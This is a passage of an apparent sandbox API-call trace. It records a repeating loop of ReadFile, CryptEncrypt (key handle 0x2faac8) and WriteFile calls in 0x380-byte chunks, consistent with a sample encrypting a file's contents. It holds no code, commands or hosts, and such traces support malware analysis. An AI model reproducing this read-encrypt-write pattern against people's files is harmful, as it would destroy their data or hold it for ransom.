lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.358] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.358] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.358] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.358] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.358] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.358] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.358] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.358] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.358] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.358] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.358] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.358] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.359] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.359] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.359] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.359] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.359] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.359] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.359] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.359] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.359] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.359] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.359] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.359] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.359] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.360] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.360] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.360] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.360] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.360] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.360] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.360] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.360] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.360] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.360] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.360] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.360] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.360] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.360] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.361] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.361] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.361] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.361] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.361] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.361] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.361] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.361] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.361] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.361] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.361] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.361] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.361] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.361] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.361] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.362] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.362] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.362] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.362] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.362] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.362] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.362] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.362] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.362] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.363] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.363] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.363] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.363] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.363] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.363] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.363] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.363] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.363] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.363] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.363] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.363] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.363] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.364] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.364] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.364] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.364] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.364] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.364] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.364] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.364] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.364] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.364] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.364] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.364] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.364] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.365] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.365] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.365] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.365] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.365] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.365] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.365] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.365] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.365] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.365] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.365] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.365] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.365] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: 